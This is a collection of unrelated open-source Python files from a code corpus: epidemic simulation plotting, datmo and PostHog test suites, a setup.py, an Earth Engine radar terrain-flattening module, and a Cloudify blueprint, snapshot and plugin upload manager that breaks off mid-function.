for k in Pk:
Pk[k] /= norm_factor
deg_seq = get_deg_seq(N, Pk)
G = nx.configuration_model(deg_seq)
kave = (sum(deg_seq)/N)
tau = 1.5*gamma/kave
fig = plt.figure(1)
ax1 = plt.gca()
inset = plt.axes([0.45,0.175,0.45,0.45])
sim_and_plot(G, tau, gamma, rho, tmax, tcount, inset)
ax1.set_xlabel('$t$')
ax1.set_ylabel('Prevalence')
plt.savefig('fig5p4.png') |
datmo/core/storage/local/tests/test_dal_environment.py | awesome-archive/datmo | 331 | 12684832 | <reponame>awesome-archive/datmo<filename>datmo/core/storage/local/tests/test_dal_environment.py
"""
Tests for LocalDAL
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import tempfile
import platform
from datetime import datetime
from datmo.core.storage.driver.blitzdb_dal_driver import BlitzDBDALDriver
from datmo.core.storage.local.dal import LocalDAL
from datmo.core.entity.model import Model
from datmo.core.entity.environment import Environment
from datmo.core.util.exceptions import EntityNotFound, InvalidArgumentType
class TestLocalDAL():
def setup_method(self):
# provide mountable tmp directory for docker
tempfile.tempdir = "/tmp" if not platform.system(
) == "Windows" else None
test_datmo_dir = os.environ.get('TEST_DATMO_DIR',
tempfile.gettempdir())
self.temp_dir = tempfile.mkdtemp(dir=test_datmo_dir)
self.driver_type = "blitzdb"
self.driver_options = {
"driver_type": "file",
"connection_string": self.temp_dir
}
self.dal = LocalDAL(self.driver_type, self.driver_options)
model_name = "model_1"
model = self.dal.model.create(Model({"name": model_name}))
self.environment_input_dict = {
"model_id": model.id,
"driver_type": "docker",
"file_collection_id": "test_file_id",
"definition_filename": "Dockerfile",
"hardware_info": {
"system": "macosx"
},
"unique_hash": "slkdjfa23dk",
"language": "python3"
}
def teardown_method(self):
pass
# TODO: Add tests for other variables once figured out.
def test_create_environment_by_dictionary(self):
environment = self.dal.environment.create(
Environment(self.environment_input_dict))
assert environment.id
assert environment.driver_type == self.environment_input_dict[
'driver_type']
assert environment.file_collection_id == self.environment_input_dict[
'file_collection_id']
assert environment.definition_filename == self.environment_input_dict[
'definition_filename']
assert environment.hardware_info == self.environment_input_dict[
'hardware_info']
assert environment.unique_hash == self.environment_input_dict[
'unique_hash']
assert environment.created_at
assert environment.updated_at
environment_2 = self.dal.environment.create(
Environment(self.environment_input_dict))
assert environment_2.id != environment.id
test_environment_input_dict = self.environment_input_dict.copy()
test_environment_input_dict['id'] = "environment_id"
environment_3 = self.dal.environment.create(
Environment(test_environment_input_dict))
assert environment_3.id == test_environment_input_dict['id']
def test_get_by_id_environment(self):
environment = self.dal.environment.create(
Environment(self.environment_input_dict))
result = self.dal.environment.get_by_id(environment.id)
assert environment.id == result.id
def test_get_by_shortened_id_environment(self):
environment = self.dal.environment.create(
Environment(self.environment_input_dict))
result = self.dal.environment.get_by_shortened_id(environment.id[:10])
assert environment.id == result.id
def test_get_by_id_environment_new_driver_instance(self):
environment = self.dal.environment.create(
Environment(self.environment_input_dict))
# create new dal with new driver instance (success)
new_driver_instance = BlitzDBDALDriver("file", self.temp_dir)
new_dal_instance = LocalDAL(
self.driver_type, self.driver_options, driver=new_driver_instance)
new_environment_1 = new_dal_instance.environment.get_by_id(
environment.id)
assert new_environment_1.id == environment.id
# create new dal instance with same driver (success)
new_dal_instance = LocalDAL(self.driver_type, self.driver_options)
new_environment_2 = new_dal_instance.environment.get_by_id(
environment.id)
assert new_environment_2.id == environment.id
def test_update_environment(self):
environment = self.dal.environment.create(
Environment(self.environment_input_dict))
# Update required and optional parameters
updated_environment_input_dict = self.environment_input_dict.copy()
updated_environment_input_dict['id'] = environment.id
updated_environment_input_dict['driver_type'] = "new_driver"
updated_environment_input_dict['created_at'] = datetime.utcnow()
updated_environment = self.dal.environment.update(
updated_environment_input_dict)
assert environment.id == updated_environment.id
assert environment.updated_at < updated_environment.updated_at
assert updated_environment.driver_type == updated_environment_input_dict[
'driver_type']
assert updated_environment.created_at == updated_environment_input_dict[
'created_at']
def test_delete_environment(self):
environment = self.dal.environment.create(
Environment(self.environment_input_dict))
self.dal.environment.delete(environment.id)
deleted = False
try:
self.dal.environment.get_by_id(environment.id)
except EntityNotFound:
deleted = True
assert deleted
def test_query_environments_basic(self):
environment = self.dal.environment.create(
Environment(self.environment_input_dict))
assert len(self.dal.environment.query({"id": environment.id})) == 1
def test_query_environments_multiple(self):
environment_1 = self.dal.environment.create(
Environment(self.environment_input_dict))
environment_2 = self.dal.environment.create(
Environment(self.environment_input_dict))
environment_3 = self.dal.environment.create(
Environment(self.environment_input_dict))
results = self.dal.environment.query(
{}, sort_key="created_at", sort_order="ascending")
assert len(results) == 3
assert results[0].created_at == environment_1.created_at
assert results[1].created_at == environment_2.created_at
results = self.dal.environment.query(
{}, sort_key="created_at", sort_order="descending")
assert len(results) == 3
assert results[0].created_at == environment_3.created_at
assert results[1].created_at == environment_2.created_at
# Wrong order being passed in
failed = False
try:
_ = self.dal.environment.query(
{}, sort_key='created_at', sort_order='wrong_order')
except InvalidArgumentType:
failed = True
assert failed
# Wrong key and order being passed in
failed = False
try:
_ = self.dal.environment.query(
{}, sort_key='wrong_key', sort_order='wrong_order')
except InvalidArgumentType:
failed = True
assert failed
# wrong key and right order being passed in
expected_items = self.dal.environment.query(
{}, sort_key='created_at', sort_order='ascending')
items = self.dal.environment.query(
{}, sort_key='wrong_key', sort_order='ascending')
expected_ids = [item.id for item in expected_items]
ids = [item.id for item in items]
assert set(expected_ids) == set(ids)
def test_query_environments_range_query(self):
_ = self.dal.environment.create(
Environment(self.environment_input_dict))
_ = self.dal.environment.create(
Environment(self.environment_input_dict))
_ = self.dal.environment.create(
Environment(self.environment_input_dict))
environments = self.dal.environment.query(
{}, sort_key="created_at", sort_order="descending")
result = self.dal.environment.query({
"created_at": {
"$lt":
environments[1]
.created_at.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
}
})
assert len(environments) == 3
assert len(result) == 1
|
setup.py | ajcr/rolling | 189 | 12684865 | from setuptools import setup, find_packages
from rolling import __version__
long_description = """**rolling** is a collection of computationally efficient
rolling window iterators for Python.
Many useful arithmetical, logical and statistical functions are implemented
to allow the window to be computed in sub-linear time (and in many instances
constant time). These include:
- Sum
- Min and Max
- All and Any
- Mean, Median and Mode
- Variance and Standard deviation
There's also a more general 'apply' mode where any specific function can be
applied to the window. Both fixed-length and variable-length windows are supported.
"""
setup(
name='rolling',
version=__version__,
description='Efficient rolling window algorithms',
long_description=long_description,
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries :: Python Modules',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
],
keywords='rolling window iterator algorithms',
project_urls={
'Source': 'https://github.com/ajcr/rolling/',
'Tracker': 'https://github.com/ajcr/rolling/issues',
},
python_requires='>=3.6.0',
author='<NAME>',
license='MIT',
packages=find_packages(include=["rolling", "rolling.*"]),
tests_require=['pytest>=2.8.0'],
zip_safe=False,
)
|
ee/clickhouse/views/test/test_clickhouse_person.py | leirons/posthog | 7,409 | 12684875 | <gh_stars>1000+
from uuid import uuid4
from ee.clickhouse.client import sync_execute
from ee.clickhouse.models.event import create_event
from ee.clickhouse.util import ClickhouseTestMixin
from posthog.api.test.test_person import factory_test_person
from posthog.models import Event, Person
from posthog.models.person import PersonDistinctId
def _create_event(**kwargs):
kwargs.update({"event_uuid": uuid4()})
return Event(pk=create_event(**kwargs))
def _get_events(team_id):
return sync_execute("SELECT * FROM events WHERE team_id = %(team_id)s", {"team_id": team_id})
def _create_person(**kwargs):
return Person.objects.create(**kwargs)
class ClickhouseTestPersonApi(
ClickhouseTestMixin, factory_test_person(_create_event, _create_person, _get_events) # type: ignore
):
def test_split_person_clickhouse(self):
person = _create_person(
team=self.team, distinct_ids=["1", "2", "3"], properties={"$browser": "whatever", "$os": "Mac OS X"}
)
response = self.client.post("/api/person/%s/split/" % person.pk,).json()
self.assertTrue(response["success"])
people = Person.objects.all().order_by("id")
clickhouse_people = sync_execute(
"SELECT id FROM person FINAL WHERE team_id = %(team_id)s", {"team_id": self.team.pk}
)
self.assertCountEqual(clickhouse_people, [(person.uuid,) for person in people])
distinct_id_rows = PersonDistinctId.objects.all().order_by("person_id")
pdis = sync_execute(
"SELECT person_id, distinct_id FROM person_distinct_id FINAL WHERE team_id = %(team_id)s",
{"team_id": self.team.pk},
)
self.assertCountEqual(pdis, [(pdi.person.uuid, pdi.distinct_id) for pdi in distinct_id_rows])
pdis2 = sync_execute(
"SELECT person_id, distinct_id FROM person_distinct_id2 FINAL WHERE team_id = %(team_id)s",
{"team_id": self.team.pk},
)
self.assertCountEqual(pdis2, [(pdi.person.uuid, pdi.distinct_id) for pdi in distinct_id_rows])
|
modules/google-earth-engine/docker/sepal-ee/sepal/ee/radar/_terrain_flattening.py | BuddyVolly/sepal | 153 | 12684879 | <reponame>BuddyVolly/sepal
import math
import ee
from sepal.ee.image import replace
# Volumetric model (Hoekman & Reiche 2015)
def apply(image):
geometry = image.geometry()
srtm = ee.Image('USGS/SRTMGL1_003').clip(geometry)
# convert Sigma0 dB to Power
sigma0_pow = ee.Image.constant(10).pow(image.divide(10.0))
# Article ( numbers relate to chapters)
# 2.1.1 Radar geometry
theta_i = image.select('angle')
phi_i = ee.Terrain.aspect(theta_i).reduceRegion(
reducer=ee.Reducer.mean(),
geometry=geometry,
scale=100
).get('aspect')
# 2.1.2 Terrain geometry
alpha_s = ee.Terrain.slope(srtm).select('slope')
phi_s = ee.Terrain.aspect(srtm).select('aspect')
# 2.1.3 Model geometry
# reduce to 3 angle
phi_r = ee.Image.constant(phi_i).subtract(phi_s)
# convert all to radians
phi_rRad = phi_r.multiply(math.pi / 180)
alpha_sRad = alpha_s.multiply(math.pi / 180)
theta_iRad = theta_i.multiply(math.pi / 180)
ninetyRad = ee.Image.constant(90).multiply(math.pi / 180)
# slope steepness in range (eq. 2)
alpha_r = (alpha_sRad.tan().multiply(phi_rRad.cos())).atan()
# slope steepness in azimuth (eq 3)
alpha_az = (alpha_sRad.tan().multiply(phi_rRad.sin())).atan()
# local incidence angle (eq. 4)
theta_lia = (alpha_az.cos().multiply((theta_iRad.subtract(alpha_r)).cos())).acos()
theta_liaDeg = theta_lia.multiply(180 / math.pi)
# 2.2
# Gamma_nought_flat
gamma0 = sigma0_pow.divide(theta_iRad.cos())
gamma0dB = ee.Image.constant(10).multiply(gamma0.log10())
ratio_1 = gamma0dB.select('VV').subtract(gamma0dB.select('VH'))
# Volumetric Model
nominator = (ninetyRad.subtract(theta_iRad).add(alpha_r)).tan()
denominator = (ninetyRad.subtract(theta_iRad)).tan()
volModel = (nominator.divide(denominator)).abs()
# apply model
gamma0_Volume = gamma0.divide(volModel)
gamma0_VolumeDB = ee.Image.constant(10).multiply(gamma0_Volume.log10())
# we add a layover/shadow mask to the original implementation
# layover, where slope > radar viewing angle
alpha_rDeg = alpha_r.multiply(180 / math.pi)
layover = alpha_rDeg.lt(theta_i)
# shadow where LIA > 90
shadow = theta_liaDeg.lt(85)
# calculate the ratio for RGB vis
ratio = gamma0_VolumeDB.select('VV').subtract(gamma0_VolumeDB.select('VH'))
output = gamma0_VolumeDB.addBands(ratio).addBands(alpha_r).addBands(phi_s).addBands(theta_iRad) \
.addBands(layover).addBands(shadow).addBands(gamma0dB).addBands(ratio_1)
# rename bands for output
return replace(
image,
output.select(
['VV', 'VH', 'slope_1', 'slope_2'],
['VV', 'VH', 'layover', 'shadow']
).addBands(image.select('angle'))
)
|
rest-service/manager_rest/upload_manager.py | cloudify-cosmo/cloudify-manager | 124 | 12684943 | #########
# Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
import os
import json
import tarfile
import uuid
import wagon
import yaml
import shutil
import zipfile
import tempfile
import requests
import traceback
from setuptools import archive_util
from flask import request, current_app
from flask_restful.reqparse import Argument
from flask_restful.inputs import boolean
from cloudify.models_states import SnapshotState, BlueprintUploadState
from manager_rest.manager_exceptions import ArchiveTypeError
from manager_rest.constants import (FILE_SERVER_PLUGINS_FOLDER,
FILE_SERVER_SNAPSHOTS_FOLDER,
FILE_SERVER_UPLOADED_BLUEPRINTS_FOLDER,
FILE_SERVER_BLUEPRINTS_FOLDER)
from manager_rest.archiving import get_archive_type
from manager_rest.storage.models import Blueprint, Plugin
from manager_rest import config, chunked, manager_exceptions, workflow_executor
from manager_rest.utils import (mkdirs,
get_formatted_timestamp,
current_tenant,
unzip,
files_in_folder,
remove)
from manager_rest.resource_manager import get_resource_manager
from manager_rest.constants import (SUPPORTED_ARCHIVE_TYPES)
from manager_rest.rest.rest_utils import get_args_and_verify_arguments
_PRIVATE_RESOURCE = 'private_resource'
_VISIBILITY = 'visibility'
class UploadedDataManager(object):
def receive_uploaded_data(self, data_id=None, **kwargs):
file_server_root = config.instance.file_server_root
resource_target_path = tempfile.mktemp()
try:
additional_inputs = self._save_file_locally_and_extract_inputs(
resource_target_path,
self._get_data_url_key(),
self._get_kind())
doc, dest_file_name = self._prepare_and_process_doc(
data_id,
file_server_root,
resource_target_path,
additional_inputs=additional_inputs,
**kwargs)
if not os.path.isfile(resource_target_path):
# if the archive is a folder, we're copying its content,
# so there is no meaning to a specific archive file name...
dest_file_name = None
self._move_archive_to_uploaded_dir(doc.id,
file_server_root,
resource_target_path,
dest_file_name=dest_file_name)
return doc, 201
finally:
remove(resource_target_path)
@classmethod
def _extract_file_to_file_server(cls, archive_path, destination_root):
"""
Extracting a package.
:param destination_root: the root destination for the unzipped archive
:param archive_path: the archive path
:return: the full path for the extracted archive
"""
# extract application to file server
tempdir = tempfile.mkdtemp('-blueprint-submit')
try:
try:
archive_util.unpack_archive(archive_path, tempdir)
except archive_util.UnrecognizedFormat:
raise manager_exceptions.BadParametersError(
'Blueprint archive is of an unrecognized format. '
'Supported formats are: {0}'
.format(SUPPORTED_ARCHIVE_TYPES))
archive_file_list = os.listdir(tempdir)
if len(archive_file_list) != 1 or not os.path.isdir(
os.path.join(tempdir, archive_file_list[0])):
raise manager_exceptions.BadParametersError(
'archive must contain exactly 1 directory')
application_dir_base_name = archive_file_list[0]
# generating temporary unique name for app dir, to allow multiple
# uploads of apps with the same name (as it appears in the file
# system, not the app name field inside the blueprint.
# the latter is guaranteed to be unique).
generated_app_dir_name = '{0}-{1}'.format(
application_dir_base_name, uuid.uuid4())
temp_application_dir = os.path.join(tempdir,
application_dir_base_name)
temp_application_target_dir = os.path.join(tempdir,
generated_app_dir_name)
shutil.move(temp_application_dir, temp_application_target_dir)
shutil.move(temp_application_target_dir, destination_root)
return generated_app_dir_name
finally:
shutil.rmtree(tempdir)
@staticmethod
def _save_file_from_url(archive_target_path, url, data_type):
if request.data or \
'Transfer-Encoding' in request.headers or \
'blueprint_archive' in request.files:
raise manager_exceptions.BadParametersError(
"Can pass {0} as only one of: URL via query parameters, "
"request body, multi-form or chunked.".format(data_type))
try:
with requests.get(url, stream=True, timeout=(5, None)) as resp:
resp.raise_for_status()
with open(archive_target_path, 'wb') as f:
for chunk in resp.iter_content(chunk_size=8192):
if chunk:
f.write(chunk)
except requests.exceptions.RequestException as e:
raise manager_exceptions.BadParametersError(
"Cannot fetch {0}: {1}".format(url, e))
@staticmethod
def _save_file_from_chunks(archive_target_path, data_type):
if request.data or 'blueprint_archive' in request.files:
raise manager_exceptions.BadParametersError(
"Can pass {0} as only one of: request body, multi-form or "
"chunked.".format(data_type))
with open(archive_target_path, 'w') as f:
for buffered_chunked in chunked.decode(request.input_stream):
f.write(buffered_chunked)
@staticmethod
def _save_file_content(archive_target_path, data_type):
if 'blueprint_archive' in request.files:
raise manager_exceptions.BadParametersError(
"Can't pass {0} both as URL via request body and multi-form"
.format(data_type))
uploaded_file_data = request.data
with open(archive_target_path, 'wb') as f:
f.write(uploaded_file_data)
def _save_files_multipart(self, archive_target_path):
inputs = {}
for file_key in request.files:
if file_key == 'inputs':
content = request.files[file_key]
# The file is a binary
if 'application' in content.content_type:
content_payload = self._save_bytes(content)
# Handling yaml
if content.content_type == 'application/octet-stream':
inputs = yaml.load(content_payload)
# Handling json
elif content.content_type == 'application/json':
inputs = json.load(content_payload)
# The file is raw json
elif 'text' in content.content_type:
inputs = json.load(content)
elif file_key == 'blueprint_archive':
self._save_bytes(request.files[file_key],
archive_target_path)
return inputs
@staticmethod
def _save_bytes(content, target_path=None):
"""
content should support read() function if target isn't supplied,
string rep is returned
:param content:
:param target_path:
:return:
"""
if not target_path:
return content.getvalue().decode("utf-8")
else:
with open(target_path, 'wb') as f:
f.write(content.read())
def _save_file_locally_and_extract_inputs(self,
archive_target_path,
url_key,
data_type='unknown'):
"""
Retrieves the file specified by the request to the local machine.
:param archive_target_path: the target of the archive
:param data_type: the kind of the data (e.g. 'blueprint')
:param url_key: if the data is passed as a url to an online resource,
the url_key specifies what header points to the requested url.
:return: None
"""
inputs = {}
# Handling importing blueprint through url
if url_key in request.args:
self._save_file_from_url(archive_target_path,
request.args[url_key],
data_type)
# handle receiving chunked blueprint
elif 'Transfer-Encoding' in request.headers:
self._save_file_from_chunks(archive_target_path, data_type)
# handler receiving entire content through data
elif request.data:
self._save_file_content(archive_target_path, data_type)
# handle inputs from form-data (for both the blueprint and inputs
# in body in form-data format)
if request.files:
inputs = self._save_files_multipart(archive_target_path)
return inputs
def _move_archive_to_uploaded_dir(self,
data_id,
root_path,
archive_path,
dest_file_name=None):
if not os.path.exists(archive_path):
raise RuntimeError("Archive [{0}] doesn't exist - Cannot move "
"archive to uploaded {1}s "
"directory".format(archive_path,
self._get_kind()))
uploaded_dir = os.path.join(
root_path,
self._get_target_dir_path(),
data_id)
if not os.path.isdir(uploaded_dir):
os.makedirs(uploaded_dir)
current_app.logger.info('uploading archive to: {0}'
.format(uploaded_dir))
if os.path.isfile(archive_path):
if not dest_file_name:
try:
archive_type = self._get_archive_type(archive_path)
except ArchiveTypeError:
raise manager_exceptions.BadParametersError(
'Blueprint archive is of an unrecognized format. '
'Supported formats are: {0}'.format(
SUPPORTED_ARCHIVE_TYPES))
dest_file_name = '{0}.{1}'.format(data_id, archive_type)
shutil.move(archive_path,
os.path.join(uploaded_dir, dest_file_name))
else:
for item in os.listdir(archive_path):
shutil.copy(os.path.join(archive_path, item), uploaded_dir)
shutil.rmtree(archive_path)
@classmethod
def _zip_dir(cls, dir_to_zip, target_zip_path):
zipf = zipfile.ZipFile(target_zip_path, 'w', zipfile.ZIP_DEFLATED)
try:
plugin_dir_base_name = os.path.basename(dir_to_zip)
rootlen = len(dir_to_zip) - len(plugin_dir_base_name)
for base, dirs, files in os.walk(dir_to_zip):
for entry in files:
fn = os.path.join(base, entry)
zipf.write(fn, fn[rootlen:])
finally:
zipf.close()
def _get_kind(self):
raise NotImplementedError('Subclass responsibility')
def _get_data_url_key(self):
raise NotImplementedError('Subclass responsibility')
def _get_target_dir_path(self):
raise NotImplementedError('Subclass responsibility')
def _get_archive_type(self, archive_path):
raise NotImplementedError('Subclass responsibility')
def _prepare_and_process_doc(self,
data_id,
file_server_root,
archive_target_path,
additional_inputs,
**kwargs):
raise NotImplementedError('Subclass responsibility')
class UploadedSnapshotsManager(UploadedDataManager):
def _get_kind(self):
return 'snapshot'
def _get_data_url_key(self):
return 'snapshot_archive_url'
def _get_target_dir_path(self):
return FILE_SERVER_SNAPSHOTS_FOLDER
def _get_archive_type(self, archive_path):
return 'zip'
def _prepare_and_process_doc(self,
data_id,
file_server_root,
archive_target_path,
**kwargs):
return get_resource_manager().create_snapshot_model(
data_id,
status=SnapshotState.UPLOADED
), None
class UploadedBlueprintsManager(UploadedDataManager):
def receive_uploaded_data(self, data_id=None, **kwargs):
blueprint_url = None
visibility = kwargs.get(_VISIBILITY, None)
labels = kwargs.get('labels', None)
override_failed_blueprint = kwargs.get('override_failed', False)
args = get_args_and_verify_arguments([
Argument('private_resource', type=boolean),
Argument('application_file_name', default='')
])
# Handle importing blueprint through url
if self._get_data_url_key() in request.args:
if request.data or \
'Transfer-Encoding' in request.headers or \
'blueprint_archive' in request.files:
raise manager_exceptions.BadParametersError(
"Can pass {0} as only one of: URL via query parameters, "
"request body, multi-form or "
"chunked.".format(self._get_kind()))
blueprint_url = request.args[self._get_data_url_key()]
visibility = get_resource_manager().get_resource_visibility(
Blueprint, data_id, visibility, args.private_resource)
new_blueprint = self._prepare_and_process_doc(
data_id,
visibility,
blueprint_url,
application_file_name=args.application_file_name,
override_failed_blueprint=override_failed_blueprint,
labels=labels)
return new_blueprint, 201
def _prepare_and_process_doc(self, data_id, visibility, blueprint_url,
application_file_name,
override_failed_blueprint,
labels=None):
# Put a new blueprint entry in DB
now = get_formatted_timestamp()
rm = get_resource_manager()
if override_failed_blueprint:
new_blueprint = rm.sm.get(Blueprint, data_id)
new_blueprint.plan = None
new_blueprint.description = None
new_blueprint.created_at = now
new_blueprint.updated_at = now
new_blueprint.main_file_name = None
new_blueprint.visibility = visibility
new_blueprint.state = BlueprintUploadState.PENDING
rm.sm.update(new_blueprint)
else:
new_blueprint = rm.sm.put(Blueprint(
plan=None,
id=data_id,
description=None,
created_at=now,
updated_at=now,
main_file_name=None,
visibility=visibility,
state=BlueprintUploadState.PENDING
))
if not blueprint_url:
new_blueprint.state = BlueprintUploadState.UPLOADING
rm.sm.update(new_blueprint)
self.upload_archive_to_file_server(data_id)
try:
new_blueprint.upload_execution, messages = rm.upload_blueprint(
data_id,
application_file_name,
blueprint_url,
config.instance.file_server_root, # for the import resolver
labels=labels
)
rm.sm.update(new_blueprint)
workflow_executor.execute_workflow(messages)
except manager_exceptions.ExistingRunningExecutionError as e:
new_blueprint.state = BlueprintUploadState.FAILED_UPLOADING
new_blueprint.error = str(e)
new_blueprint.error_traceback = traceback.format_exc()
rm.sm.update(new_blueprint)
self.cleanup_blueprint_archive_from_file_server(
data_id, current_tenant.name)
raise
return new_blueprint
def upload_archive_to_file_server(self, blueprint_id):
file_server_root = config.instance.file_server_root
archive_target_path = tempfile.mktemp()
try:
self._save_file_locally_and_extract_inputs(
archive_target_path,
None,
self._get_kind())
self._move_archive_to_uploaded_dir(
blueprint_id,
file_server_root,
archive_target_path)
except Exception as e:
sm = get_resource_manager().sm
blueprint = sm.get(Blueprint, blueprint_id)
blueprint.state = BlueprintUploadState.FAILED_UPLOADING
blueprint.error = str(e)
sm.update(blueprint)
self.cleanup_blueprint_archive_from_file_server(
blueprint_id, blueprint.tenant.name)
raise
finally:
remove(archive_target_path)
def extract_blueprint_archive_to_file_server(self, blueprint_id, tenant):
sm = get_resource_manager().sm
file_server_root = config.instance.file_server_root
local_path = os.path.join(
config.instance.file_server_root,
FILE_SERVER_UPLOADED_BLUEPRINTS_FOLDER,
tenant,
blueprint_id)
for arc_type in SUPPORTED_ARCHIVE_TYPES:
# attempting to find the archive file on the file system
local_file_path = os.path.join(
local_path,
'{0}.{1}'.format(blueprint_id, arc_type)
)
if os.path.isfile(local_file_path):
break
else:
error_msg = "Could not find blueprint's archive; " \
"Blueprint ID: {0}".format(blueprint_id)
blueprint = sm.get(Blueprint, blueprint_id)
blueprint.state = \
BlueprintUploadState.FAILED_EXTRACTING_TO_FILE_SERVER
blueprint.error = error_msg
sm.update(blueprint)
raise manager_exceptions.NotFoundError(error_msg)
try:
app_dir = self._extract_file_to_file_server(local_file_path,
file_server_root)
except Exception as e:
blueprint = sm.get(Blueprint, blueprint_id)
blueprint.state = \
BlueprintUploadState.FAILED_EXTRACTING_TO_FILE_SERVER
blueprint.error = str(e)
sm.update(blueprint)
remove(local_path)
raise e
tenant_dir = os.path.join(
file_server_root,
FILE_SERVER_BLUEPRINTS_FOLDER,
tenant)
mkdirs(tenant_dir)
bp_from = os.path.join(file_server_root, app_dir)
bp_dir = os.path.join(tenant_dir, blueprint_id)
try:
# use os.rename - bp_from is already in file_server_root, ie.
# same filesystem as the target dir
os.rename(bp_from, bp_dir)
except OSError as e: # eg. directory not empty
shutil.rmtree(bp_from)
raise manager_exceptions.ConflictError(str(e))
self._process_plugins(file_server_root, blueprint_id)
@staticmethod
def cleanup_blueprint_archive_from_file_server(blueprint_id, tenant):
remove(os.path.join(config.instance.file_server_root,
FILE_SERVER_UPLOADED_BLUEPRINTS_FOLDER,
tenant,
blueprint_id))
def _get_kind(self):
return 'blueprint'
def _get_data_url_key(self):
return 'blueprint_archive_url'
def _get_target_dir_path(self):
return os.path.join(
FILE_SERVER_UPLOADED_BLUEPRINTS_FOLDER, current_tenant.name)
def _get_archive_type(self, archive_path):
return get_archive_type(archive_path)
@classmethod
def _process_plugins(cls, file_server_root, blueprint_id):
plugins_directory = os.path.join(
file_server_root,
FILE_SERVER_BLUEPRINTS_FOLDER,
current_tenant.name,
blueprint_id,
"plugins")
if not os.path.isdir(plugins_directory):
return
plugins = [os.path.join(plugins_directory, directory)
for directory in os.listdir(plugins_directory)
if os.path.isdir(os.path.join(plugins_directory,
directory))]
for plugin_dir in plugins:
final_zip_name = '{0}.zip'.format(os.path.basename(plugin_dir))
target_zip_path = os.path.join(plugins_directory, final_zip_name)
cls._zip_dir(plugin_dir, target_zip_path)
class UploadedBlueprintsValidator(UploadedBlueprintsManager):
def receive_uploaded_data(self, data_id=None, **kwargs):
blueprint_url = None
# avoid clashing with existing blueprint names
blueprint_id = data_id + uuid.uuid4().hex[:16]
args = get_args_and_verify_arguments([
Argument('application_file_name', default='')
])
# Handle importing blueprint through url
if self._get_data_url_key() in request.args:
if request.data or \
'Transfer-Encoding' in request.headers or \
'blueprint_archive' in request.files:
raise manager_exceptions.BadParametersError(
"Can pass {0} as only one of: URL via query parameters, "
"request body, multi-form or "
"chunked.".format(self._get_kind()))
blueprint_url = request.args[self._get_data_url_key()]
self._prepare_and_process_doc(
blueprint_id,
blueprint_url,
application_file_name=args.application_file_name)
return "", 204
def _prepare_and_process_doc(self, data_id, blueprint_url,
application_file_name):
# Put a temporary blueprint entry in DB
rm = get_resource_manager()
now = get_formatted_timestamp()
temp_blueprint = rm.sm.put(Blueprint(
plan=None,
id=data_id,
description=None,
created_at=now,
updated_at=now,
main_file_name=None,
visibility=None,
state=BlueprintUploadState.VALIDATING
))
if not blueprint_url:
self.upload_archive_to_file_server(data_id)
try:
temp_blueprint.upload_execution, messages = rm.upload_blueprint(
data_id,
application_file_name,
blueprint_url,
config.instance.file_server_root, # for the import resolver
validate_only=True,
)
workflow_executor.execute_workflow(messages)
except manager_exceptions.ExistingRunningExecutionError:
rm.sm.delete(temp_blueprint)
self.cleanup_blueprint_archive_from_file_server(
data_id, current_tenant.name)
raise
class UploadedPluginsManager(UploadedDataManager):
def _get_kind(self):
return 'plugin'
def _get_data_url_key(self):
return 'plugin_archive_url'
def _get_target_dir_path(self):
return FILE_SERVER_PLUGINS_FOLDER
def _get_archive_type(self, archive_path):
return 'tar.gz'
def _prepare_and_process_doc(self,
data_id,
file_server_root,
archive_target_path,
**kwargs):
# support previous implementation
wagon_target_path = archive_target_path
# handle the archive_target_path, which may be zip or wagon
if not self._is_wagon_file(archive_target_path):
if not zipfile.is_zipfile(archive_target_path):
raise manager_exceptions.InvalidPluginError(
'input can be only a wagon or a zip file.')
archive_name = unzip(archive_target_path,
logger=current_app.logger)
os.remove(archive_target_path)
shutil.move(archive_name, archive_target_path)
try:
wagon_target_path, _ = \
self._verify_archive(archive_target_path)
except RuntimeError as re:
raise manager_exceptions.InvalidPluginError(str(re))
args = get_args_and_verify_arguments([
Argument('title'),
Argument('private_resource', type=boolean),
Argument('visibility')])
visibility = kwargs.get(_VISIBILITY, None)
new_plugin = self._create_plugin_from_archive(data_id,
args.title,
wagon_target_path,
args.private_resource,
visibility)
filter_by_name = {'package_name': new_plugin.package_name}
sm = get_resource_manager().sm
plugins = sm.list(Plugin, filters=filter_by_name)
for plugin in plugins:
if plugin.archive_name == new_plugin.archive_name:
raise manager_exceptions.ConflictError(
'a plugin archive by the name of {archive_name} already '
'exists for package with name {package_name} and version '
'{version}'.format(archive_name=new_plugin.archive_name,
package_name=new_plugin.package_name,
version=new_plugin.package_version))
dest_path = new_plugin.archive_name
sm.put(new_plugin)
return new_plugin, dest_path
def _is_wagon_file(self, file_path):
try:
self._load_plugin_package_json(file_path)
except Exception:
return False
else:
return True
@staticmethod
def _verify_archive(archive_path):
wagons = files_in_folder(archive_path, '*.wgn')
yamls = files_in_folder(archive_path, '*.yaml')
if len(wagons) != 1 or len(yamls) != 1:
raise RuntimeError("Archive must include one wgn file "
"and one yaml file")
return wagons[0], yamls[0]
def _create_plugin_from_archive(self,
plugin_id,
plugin_title,
archive_path,
private_resource,
visibility):
plugin = self._load_plugin_package_json(archive_path)
build_props = plugin.get('build_server_os_properties')
plugin_info = {'package_name': plugin.get('package_name'),
'archive_name': plugin.get('archive_name')}
resource_manager = get_resource_manager()
visibility = resource_manager.get_resource_visibility(
Plugin,
plugin_id,
visibility,
private_resource,
plugin_info
)
return Plugin(
id=plugin_id,
title=plugin_title or plugin.get('package_name'),
package_name=plugin.get('package_name'),
package_version=plugin.get('package_version'),
archive_name=plugin.get('archive_name'),
package_source=plugin.get('package_source'),
supported_platform=plugin.get('supported_platform'),
distribution=build_props.get('distribution'),
distribution_version=build_props.get('distribution_version'),
distribution_release=build_props.get('distribution_release'),
wheels=plugin.get('wheels'),
